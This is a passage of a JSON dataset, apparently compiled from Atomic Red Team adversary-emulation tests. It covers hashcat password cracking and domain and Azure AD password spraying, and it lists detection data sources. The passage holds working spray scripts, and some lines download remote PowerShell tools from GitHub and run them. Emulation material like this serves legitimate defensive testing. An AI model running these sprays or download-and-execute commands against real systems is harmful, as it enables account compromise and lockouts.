echo #{hashcat_exe})) {exit 0} else {exit 1}", + "get_prereq_command": "Invoke-WebRequest \"https://www.7-zip.org/a/7z1900.exe\" -OutFile \"$env:TEMP\\7z1900.exe\"\nStart-Process -FilePath \"$env:Temp\\7z1900.exe\" -ArgumentList \"/S /D=$env:temp\\7zi\" -NoNewWindow\nInvoke-WebRequest \"https://hashcat.net/files/hashcat-6.1.1.7z\" -OutFile \"$env:TEMP\\hashcat6.7z\"\nStart-Process cmd.exe -Args \"/c %temp%\\7z\\7z.exe x %temp%\\hashcat6.7z -aoa -o%temp%\\hashcat-unzip\" -Wait\nNew-Item -ItemType Directory (Split-Path $(cmd /c echo #{hashcat_exe})) -Force | Out-Null\nMove-Item $env:Temp\\hashcat-unzip\\hashcat-6.1.1\\* $(cmd /c echo #{hashcat_exe}\\..) -Force -ErrorAction Ignore" + } + ], + "executor": { + "command": "cd #{hashcat_exe}\\..\n#{hashcat_exe} -a 0 -m 1000 -r .\\rules\\Incisive-leetspeak.rule #{input_file_sam} #{input_file_passwords}", + "cleanup_command": "del %temp%\\hashcat6.7z >nul 2>&1\ndel %temp%\\7z1900.exe >nul 2>&1\ndel %temp%\\7z /Q /S >nul 2>&1\ndel %temp%\\hashcat-unzip /Q /S >nul 2>&1", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1110.003", + "command_list": [ + "@FOR /F %n in (%temp%\\users.txt) do @echo | set/p=. 
& @net use %logonserver%\\IPC$ /user:\"%userdomain%\\%n\" \"Spring2020\" 1>NUL 2>&1 && @echo [*] %n:Spring2020 && @net use /delete %logonserver%\\IPC$ > NUL\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1' -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain $Env:USERDOMAIN -Force\n", + "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n$DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' -Server #{domain} | Select-Object -ExpandProperty SamAccountName\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$DomainUsers | Foreach-Object {\n $user = $_\n $password = 'P@ssw0rd!'\n\n $credz = new-object System.Net.NetworkCredential($user, $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account ${user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] 
${user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of password spraying\"\n", + "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n$DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' -Server $env:UserDnsDomain | Select-Object -ExpandProperty SamAccountName\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"$env:UserDnsDomain\",389)\n\n$DomainUsers | Foreach-Object {\n $user = $_\n $password = '#{password}'\n\n $credz = new-object System.Net.NetworkCredential($user, $password, \"$env:UserDnsDomain\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account ${user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] 
${user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of password spraying\"\n", + "if (\"NTLM\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n$DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' -Server #{domain} | Select-Object -ExpandProperty SamAccountName\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$DomainUsers | Foreach-Object {\n $user = $_\n $password = '#{password}'\n\n $credz = new-object System.Net.NetworkCredential($user, $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::NTLM)\n try {\n Write-Host \" [-] Attempting ${password} on account ${user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] 
${user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of password spraying\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{valid_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{valid_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n\n($Users = Get-AzureADUser -All $true) > $null\nDisconnect-AzureAD > $null\n$PWord = ConvertTo-SecureString -String \"P@ssw0rd!\" -AsPlainText -Force\n\n$Users | Foreach-Object {\n $user = $_.UserPrincipalName\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"$user\", $Pword\n try {\n Write-Host \" [-] Attempting P@ssw0rd! on account ${user}.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] ${user}:P@ssw0rd! are valid credentials!`r`n\"\n Disconnect-AzureAD > $null\n } catch {\n Write-Host \" [-] ${user}:P@ssw0rd! 
invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of password spraying\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{valid_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"bruce.wayne@contoso.com\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n\n($Users = Get-AzureADUser -All $true) > $null\nDisconnect-AzureAD > $null\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n\n$Users | Foreach-Object {\n $user = $_.UserPrincipalName\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"$user\", $Pword\n try {\n Write-Host \" [-] Attempting #{password} on account ${user}.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] ${user}:#{password} are valid credentials!`r`n\"\n Disconnect-AzureAD > $null\n } catch {\n Write-Host \" [-] ${user}:#{password} invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of password spraying\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"iamthebatman\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{valid_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n\n($Users = Get-AzureADUser -All $true) > $null\nDisconnect-AzureAD > $null\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n\n$Users | Foreach-Object {\n $user = $_.UserPrincipalName\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"$user\", $Pword\n try {\n Write-Host \" [-] Attempting #{password} on account ${user}.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so 
if we're here we can display success\n Write-Host \" [!] ${user}:#{password} are valid credentials!`r`n\"\n Disconnect-AzureAD > $null\n } catch {\n Write-Host \" [-] ${user}:#{password} invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of password spraying\"\n", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndomainpassspray -consoleoutput -noninteractive -emptypasswords", + null, + "function Invoke-dpsLight ($Password, $userlist) {\n$users = Get-Content $userlist\n$Domain = \"LDAP://\" + ([ADSI]\"\").distinguishedName\nforeach ($User in $users) {\n $Domain_check = New-Object System.DirectoryServices.DirectoryEntry($Domain, $User, $Password)\n if ($Domain_check.name -ne $null) {\n Write-Host -ForegroundColor Green \"Password found for User:$User Password:$Password\"\n }\n else { Write-Host \". \" -NoNewline}\n}\nWrite-Host -ForegroundColor green \"Finished\"\n}\nInvoke-dpsLight \"Spring2020\" $env:Temp\\usersdpsLight.txt\n" + ], + "commands": [ + { + "command": "@FOR /F %n in (%temp%\\users.txt) do @echo | set/p=. 
& @net use %logonserver%\\IPC$ /user:\"%userdomain%\\%n\" \"Spring2020\" 1>NUL 2>&1 && @echo [*] %n:Spring2020 && @net use /delete %logonserver%\\IPC$ > NUL\n", + "source": "atomics/T1110.003/T1110.003.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Spraying" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1' -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain $Env:USERDOMAIN -Force\n", + "source": "atomics/T1110.003/T1110.003.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Spraying" + }, + { + "command": "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n$DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' -Server #{domain} | Select-Object -ExpandProperty SamAccountName\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$DomainUsers | Foreach-Object {\n $user = $_\n $password = 'P@ssw0rd!'\n\n $credz = new-object System.Net.NetworkCredential($user, $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account ${user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] 
${user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of password spraying\"\n", + "source": "atomics/T1110.003/T1110.003.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Spraying" + }, + { + "command": "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n$DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' -Server $env:UserDnsDomain | Select-Object -ExpandProperty SamAccountName\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"$env:UserDnsDomain\",389)\n\n$DomainUsers | Foreach-Object {\n $user = $_\n $password = '#{password}'\n\n $credz = new-object System.Net.NetworkCredential($user, $password, \"$env:UserDnsDomain\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account ${user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] 
${user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of password spraying\"\n", + "source": "atomics/T1110.003/T1110.003.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Spraying" + }, + { + "command": "if (\"NTLM\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n$DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' -Server #{domain} | Select-Object -ExpandProperty SamAccountName\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$DomainUsers | Foreach-Object {\n $user = $_\n $password = '#{password}'\n\n $credz = new-object System.Net.NetworkCredential($user, $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::NTLM)\n try {\n Write-Host \" [-] Attempting ${password} on account ${user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] 
${user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of password spraying\"\n", + "source": "atomics/T1110.003/T1110.003.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Spraying" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{valid_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{valid_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n\n($Users = Get-AzureADUser -All $true) > $null\nDisconnect-AzureAD > $null\n$PWord = ConvertTo-SecureString -String \"P@ssw0rd!\" -AsPlainText -Force\n\n$Users | Foreach-Object {\n $user = $_.UserPrincipalName\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"$user\", $Pword\n try {\n Write-Host \" [-] Attempting P@ssw0rd! on account ${user}.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] ${user}:P@ssw0rd! are valid credentials!`r`n\"\n Disconnect-AzureAD > $null\n } catch {\n Write-Host \" [-] ${user}:P@ssw0rd! 
invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of password spraying\"\n", + "source": "atomics/T1110.003/T1110.003.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Spraying" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{valid_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"bruce.wayne@contoso.com\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n\n($Users = Get-AzureADUser -All $true) > $null\nDisconnect-AzureAD > $null\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n\n$Users | Foreach-Object {\n $user = $_.UserPrincipalName\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"$user\", $Pword\n try {\n Write-Host \" [-] Attempting #{password} on account ${user}.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] 
${user}:#{password} are valid credentials!`r`n\"\n Disconnect-AzureAD > $null\n } catch {\n Write-Host \" [-] ${user}:#{password} invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of password spraying\"\n", + "source": "atomics/T1110.003/T1110.003.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Spraying" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"iamthebatman\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{valid_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n\n($Users = Get-AzureADUser -All $true) > $null\nDisconnect-AzureAD > $null\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n\n$Users | Foreach-Object {\n $user = $_.UserPrincipalName\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"$user\", $Pword\n try {\n Write-Host \" [-] Attempting #{password} on account ${user}.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] 
${user}:#{password} are valid credentials!`r`n\"\n Disconnect-AzureAD > $null\n } catch {\n Write-Host \" [-] ${user}:#{password} invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of password spraying\"\n", + "source": "atomics/T1110.003/T1110.003.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Spraying" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndomainpassspray -consoleoutput -noninteractive -emptypasswords", + "source": "atomics/T1110.003/T1110.003.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Spraying" + }, + { + "command": null, + "source": "atomics/T1110.003/T1110.003.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Spraying" + }, + { + "command": "function Invoke-dpsLight ($Password, $userlist) {\n$users = Get-Content $userlist\n$Domain = \"LDAP://\" + ([ADSI]\"\").distinguishedName\nforeach ($User in $users) {\n $Domain_check = New-Object System.DirectoryServices.DirectoryEntry($Domain, $User, $Password)\n if ($Domain_check.name -ne $null) {\n Write-Host -ForegroundColor Green \"Password found for User:$User Password:$Password\"\n }\n else { Write-Host \". \" -NoNewline}\n}\nWrite-Host -ForegroundColor green \"Finished\"\n}\nInvoke-dpsLight \"Spring2020\" $env:Temp\\usersdpsLight.txt\n", + "source": "atomics/T1110.003/T1110.003.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Spraying" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1110.003", + "display_name": "Brute Force: Password Spraying", + "atomic_tests": [ + { + "name": "Password Spray all Domain Users", + "auto_generated_guid": "90bc2e54-6c84-47a5-9439-0a2a92b4b175", + "description": "CAUTION! 
Be very careful to not exceed the password lockout threshold for users in the domain by running this test too frequently.\nThis atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\\users.txt list. Any successful authentications will be printed to the screen with a message like \"[*] username:password\", whereas a failed auth will simply print a period. Use the input arguments to specify your own password to use for the password spray.\nUse the get_prereq_command's to create a list of all domain users in the temp directory called users.txt.\nSee the \"Windows FOR Loop Password Spraying Made Easy\" blog by @OrOneEqualsOne for more details on how these spray commands work. https://medium.com/walmartlabs/windows-for-loop-password-spraying-made-easy-c8cd4ebb86b5", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "password": { + "description": "The password to try for each user in users.txt", + "type": "String", + "default": "Spring2020" + } + }, + "dependencies": [ + { + "description": "List of domain users to password spray must exits at %temp%\\users.txt\n", + "prereq_command": "if not exist %temp%\\users.txt (exit /b 1)\n", + "get_prereq_command": "PathToAtomicsFolder\\T1110.003\\src\\parse_net_users.bat\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "@FOR /F %n in (%temp%\\users.txt) do @echo | set/p=. & @net use %logonserver%\\IPC$ /user:\"%userdomain%\\%n\" \"#{password}\" 1>NUL 2>&1 && @echo [*] %n:#{password} && @net use /delete %logonserver%\\IPC$ > NUL\n" + } + }, + { + "name": "Password Spray (DomainPasswordSpray)", + "auto_generated_guid": "263ae743-515f-4786-ac7d-41ef3a0d4b2b", + "description": "Perform a domain password spray using the DomainPasswordSpray tool. 
It will try a single password against all users in the domain\n\nhttps://github.com/dafthack/DomainPasswordSpray\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "domain": { + "description": "Domain to brute force against", + "type": "String", + "default": "$Env:USERDOMAIN" + } + }, + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1' -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force\n" + } + }, + { + "name": "Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)", + "auto_generated_guid": "f14d956a-5b6e-4a93-847f-0c415142f07d", + "description": "Attempt to brute force all Active Directory domain users with a single password (called \"password spraying\") on a domain controller, via LDAP, with NTLM or Kerberos\n\nPrerequisite: AD RSAT PowerShell module is needed and it must run under a domain user (to fetch the list of all domain users)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "password": { + "description": "single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001)", + "type": "String", + "default": "P@ssw0rd!" 
+ }, + "domain": { + "description": "Domain FQDN", + "type": "String", + "default": "$env:UserDnsDomain" + }, + "auth": { + "description": "authentication method to choose between \"NTLM\" and \"Kerberos\"", + "type": "String", + "default": "NTLM" + } + }, + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n$DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' -Server #{domain} | Select-Object -ExpandProperty SamAccountName\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$DomainUsers | Foreach-Object {\n $user = $_\n $password = '#{password}'\n\n $credz = new-object System.Net.NetworkCredential($user, $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account ${user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] 
${user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of password spraying\"\n" + } + }, + { + "name": "Password spray all Azure AD users with a single password", + "auto_generated_guid": "a8aa2d3e-1c52-4016-bc73-0f8854cfa80a", + "description": "Attempt to brute force all Azure AD users with a single password (called \"password spraying\") via AzureAD Powershell module.\nValid credentials are only needed to fetch the list of Azure AD users.\n", + "supported_platforms": [ + "azure-ad" + ], + "input_arguments": { + "password": { + "description": "Single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001)", + "type": "String", + "default": "P@ssw0rd!" + }, + "valid_username": { + "description": "Valid username to retrieve Azure AD users. We encourage users running this atomic to add a valid microsoft account domain; for eg @", + "type": "String", + "default": "bruce.wayne@contoso.com" + }, + "valid_password": { + "description": "Valid password to authenticate as valid_username in the ", + "type": "String", + "default": "iamthebatman" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AzureAD module must be installed.\n", + "prereq_command": "try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}\n", + "get_prereq_command": "Install-Module -Name AzureAD -Force\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{valid_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{valid_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n\n($Users = Get-AzureADUser -All $true) > $null\nDisconnect-AzureAD > $null\n$PWord = ConvertTo-SecureString -String 
